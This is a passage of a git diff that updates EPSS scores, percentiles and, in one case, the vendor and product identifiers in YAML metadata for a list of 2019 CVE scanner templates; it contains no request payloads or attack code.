b/http/cves/2019/CVE-2019-1010287.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-1010287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47354 + epss-percentile: 0.47461 cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index cf69a18157..4d79f47656 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-1010290 cwe-id: CWE-601 - epss-score: 0.00281 - epss-percentile: 0.6494 + epss-score: 0.00215 + epss-percentile: 0.59513 cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index 6a4905cc2f..8692f9b8b6 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-10232 cwe-id: CWE-89 epss-score: 0.14229 - epss-percentile: 0.95162 + epss-percentile: 0.95184 cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 34f550bbc9..98797e92a6 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-10405 cwe-id: CWE-79 epss-score: 0.00572 - epss-percentile: 0.75378 + epss-percentile: 0.75485 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml index a9a7d246d0..74a79e7deb 100644 --- a/http/cves/2019/CVE-2019-10475.yaml +++ b/http/cves/2019/CVE-2019-10475.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-10475 cwe-id: CWE-79 epss-score: 0.97301 - epss-percentile: 0.99849 + epss-percentile: 0.99853 cpe: cpe:2.3:a:jenkins:build-metrics:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index 4f7efb9038..94a2a9d1ee 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-10692 cwe-id: CWE-89 epss-score: 0.9737 - epss-percentile: 0.99886 + epss-percentile: 0.99889 cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 4eabf9076d..126a2b6611 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.1 cve-id: CVE-2019-10717 cwe-id: CWE-22 - epss-score: 0.0042 - epss-percentile: 0.71316 + epss-score: 0.00409 + epss-percentile: 0.71125 cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 5772f03f2a..f8d5f80f00 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.9 cve-id: CVE-2019-10758 epss-score: 0.97429 - epss-percentile: 0.99929 + epss-percentile: 0.99932 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index c077405ffc..1c28561cb0 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-11013 cwe-id: CWE-22 epss-score: 0.01775 - epss-percentile: 0.86628 + epss-percentile: 0.86672 cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 33acc1e253..1222bb0982 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.2 cve-id: CVE-2019-11248 cwe-id: CWE-862,CWE-419 - epss-score: 0.72895 - epss-percentile: 0.9779 + epss-score: 0.69166 + epss-percentile: 0.97708 cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 5ee2534156..30a05788e4 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-11370 cwe-id: CWE-79 epss-score: 0.1896 - epss-percentile: 0.95746 + epss-percentile: 0.95786 cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 978081ad92..c2ddc395ca 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -20,13 +20,13 @@ info: cvss-score: 10 cve-id: CVE-2019-11510 cwe-id: CWE-22 - epss-score: 0.97278 - epss-percentile: 0.99832 - cpe: cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.0:*:*:*:*:*:* + epss-score: 0.97284 + epss-percentile: 0.99839 + cpe: cpe:2.3:a:ivanti:connect_secure:9.0:r1:*:*:*:*:*:* metadata: max-request: 1 - vendor: pulsesecure - product: pulse_connect_secure + vendor: ivanti + product: connect_secure tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev http: diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 4f1e164379..00b651f104 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -18,7 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-11580 - epss-score: 0.97491 + epss-score: 0.97457 + epss-percentile: 0.99952 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index 2bfd88dc11..018cf3a226 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-11581 cwe-id: CWE-74 epss-score: 0.97379 - epss-percentile: 0.99893 + epss-percentile: 0.99897 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index 4be6e3ee75..6faa35e89f 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -26,8 +26,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-11869 cwe-id: CWE-79 - epss-score: 0.00291 - epss-percentile: 0.65616 + epss-score: 0.00218 + epss-percentile: 0.597 cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index 4202ecbcd2..1155d3c32d 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-12276 cwe-id: CWE-22 epss-score: 0.96216 - epss-percentile: 0.99387 + epss-percentile: 0.99405 cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index 8bdce7a6d4..b26496ca97 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12314 cwe-id: CWE-22 - epss-score: 0.22165 - epss-percentile: 0.96002 + epss-score: 0.22126 + epss-percentile: 0.96038 cpe: cpe:2.3:a:deltek:maconomy:2.2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index 79f855dff8..5a9be72327 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-12461 cwe-id: CWE-79 epss-score: 0.00269 - epss-percentile: 0.64193 + epss-percentile: 0.6435 cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index 1d68f35d3d..d93c4c2c87 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-12581 cwe-id: CWE-79 epss-score: 0.00642 - epss-percentile: 0.76895 + epss-percentile: 0.76988 cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index 9e821cf84a..35f9141e99 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-12583 cwe-id: CWE-425 epss-score: 0.00481 - epss-percentile: 0.73162 + epss-percentile: 0.73297 cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index b140cff091..9e38cf1bfa 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-12593 cwe-id: CWE-22 - epss-score: 0.15747 - epss-percentile: 0.95391 + epss-score: 0.1185 + epss-percentile: 0.94799 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index 9f0d0e6d32..cb707a1d8f 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-12616 cwe-id: CWE-352 - epss-score: 0.0089 - epss-percentile: 0.80722 + epss-score: 0.01434 + epss-percentile: 0.85177 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index 4b8595df6c..c88ea3da04 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12725 cwe-id: CWE-78 - epss-score: 0.96008 - epss-percentile: 0.9933 + epss-score: 0.9634 + epss-percentile: 0.99443 cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index 393ec0f130..639a44cd88 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-12962 cwe-id: CWE-79 epss-score: 0.20689 - epss-percentile: 0.95892 + epss-percentile: 0.95942 cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index f1e2bdd800..5e9ba2a894 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12985 cwe-id: CWE-78 - epss-score: 0.97438 - epss-percentile: 0.9994 + epss-score: 0.97297 + epss-percentile: 0.9985 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index 067f58cf66..8518844346 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12986 cwe-id: CWE-78 - epss-score: 0.97438 - epss-percentile: 0.9994 + epss-score: 0.97297 + epss-percentile: 0.9985 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 7fd626326c..07a57e3b3f 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12987 cwe-id: CWE-78 - epss-score: 0.97438 - epss-percentile: 0.9994 + epss-score: 0.97297 + epss-percentile: 0.9985 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index ff3b0942b3..1b1ea3fd1b 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12988 cwe-id: CWE-78 - epss-score: 0.97438 - epss-percentile: 0.9994 + epss-score: 0.97297 + epss-percentile: 0.9985 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 54e6e04379..11f09f40a4 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12990 cwe-id: CWE-22 - epss-score: 0.94814 - epss-percentile: 0.9908 + epss-score: 0.92152 + epss-percentile: 0.9874 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index 6306d436ba..f51719f8ee 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-13101 cwe-id: CWE-306 epss-score: 0.0359 - epss-percentile: 0.90639 + epss-percentile: 0.90708 cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 84c0868349..15b32dcaff 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-13392 cwe-id: CWE-79 epss-score: 0.0014 - epss-percentile: 0.49483 + epss-percentile: 0.49585 cpe: cpe:2.3:a:mindpalette:natemail:3.0.15:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index 12a73fb076..900f9396fe 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-13396 cwe-id: CWE-22 epss-score: 0.02107 - epss-percentile: 0.87921 + epss-percentile: 0.87968 cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index 845b9724ae..bef23211d9 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.1 cve-id: CVE-2019-13462 cwe-id: CWE-89 - epss-score: 0.41579 - epss-percentile: 0.96947 + epss-score: 0.47505 + epss-percentile: 0.97151 cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index f80cc13da0..e1d3d95420 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-14205 cwe-id: CWE-22 - epss-score: 0.0387 - epss-percentile: 0.90972 + epss-score: 0.05117 + epss-percentile: 0.92168 cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index b97dd91e83..eaf25ce11d 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-14223 cwe-id: CWE-601 epss-score: 0.00188 - epss-percentile: 0.56123 + epss-percentile: 0.5628 cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index f9d4e790b7..fcab8ff501 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-14251 cwe-id: CWE-22 - epss-score: 0.01702 - epss-percentile: 0.8635 + epss-score: 0.01412 + epss-percentile: 0.85055 cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 9a3a862227..38662377ea 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-14312 cwe-id: CWE-22 epss-score: 0.01777 - epss-percentile: 0.86636 + epss-percentile: 0.8668 cpe: cpe:2.3:a:aptana:jaxer:1.0.3.4547:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 9669cb0ead..ae8511341c 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-14322 cwe-id: CWE-22 epss-score: 0.58463 - epss-percentile: 0.97407 + epss-percentile: 0.97438 cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 0ecfd3be76..7ab2c9be55 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14470 cwe-id: CWE-79 - epss-score: 0.80616 - epss-percentile: 0.98012 + epss-score: 0.80196 + epss-percentile: 0.98028 cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index ae235e166b..84a698227d 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-14530 cwe-id: CWE-22 - epss-score: 0.8219 - epss-percentile: 0.98088 + epss-score: 0.81752 + epss-percentile: 0.98091 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index 0ab540fb0b..e480e79042 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-14696 cwe-id: CWE-79 epss-score: 0.00776 - epss-percentile: 0.79275 + epss-percentile: 0.79368 cpe: cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 4f04b29f73..879ad6facd 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14750 cwe-id: CWE-79 - epss-score: 0.05309 - epss-percentile: 0.92267 + epss-score: 0.05107 + epss-percentile: 0.92161 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 4c1e0a4166..a86d278378 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-14789 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.46648 + epss-percentile: 0.46761 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index a38c12c3df..960e49638f 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-14974 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59533 + epss-percentile: 0.59694 cpe: cpe:2.3:a:sugarcrm:sugarcrm:9.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index 117cd2365b..36151ded00 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-15043 cwe-id: CWE-306 epss-score: 0.24058 - epss-percentile: 0.96139 + epss-percentile: 0.96166 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 1cfb7d83d7..9d13d2d645 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-15107 cwe-id: CWE-78 - epss-score: 0.9748 - epss-percentile: 0.99964 + epss-score: 0.97494 + epss-percentile: 0.99975 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index cbbde31d75..3472505e1b 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-15501 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.66274 + epss-percentile: 0.6646 cpe: cpe:2.3:a:lsoft:listserv:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index d3b05abedd..199765b6c9 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-15642 cwe-id: CWE-94 - epss-score: 0.26994 - epss-percentile: 0.96304 + epss-score: 0.22278 + epss-percentile: 0.9605 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index 85673396a5..d95ecadb5f 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15713 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.4106 + epss-percentile: 0.41137 cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index 7bd35dcac8..03c09229e5 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-15811 cwe-id: CWE-79 epss-score: 0.00376 - epss-percentile: 0.69735 + epss-percentile: 0.69902 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index f21ef7b9a0..af3c58af2d 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15829 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.50341 + epss-percentile: 0.50448 cpe: cpe:2.3:a:greentreelabs:gallery_photoblocks:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index fec2177f00..79fce60558 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-15858 cwe-id: CWE-306 - epss-score: 0.02782 - epss-percentile: 0.89492 + epss-score: 0.036 + epss-percentile: 0.90724 cpe: cpe:2.3:a:webcraftic:woody_ad_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index 45e1e8a98e..cd8bdb9944 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-15859 cwe-id: CWE-200 epss-score: 0.12379 - epss-percentile: 0.94862 + epss-percentile: 0.94891 cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index f4352df685..9aa09569de 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-15889 cwe-id: CWE-79 - epss-score: 0.03694 - epss-percentile: 0.9077 + epss-score: 0.03568 + epss-percentile: 0.90679 cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 30ccf13c49..8a518be42f 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-16057 cwe-id: CWE-78 epss-score: 0.9754 - epss-percentile: 0.99993 + epss-percentile: 0.99995 cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index 22cd956053..d073f27aea 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ 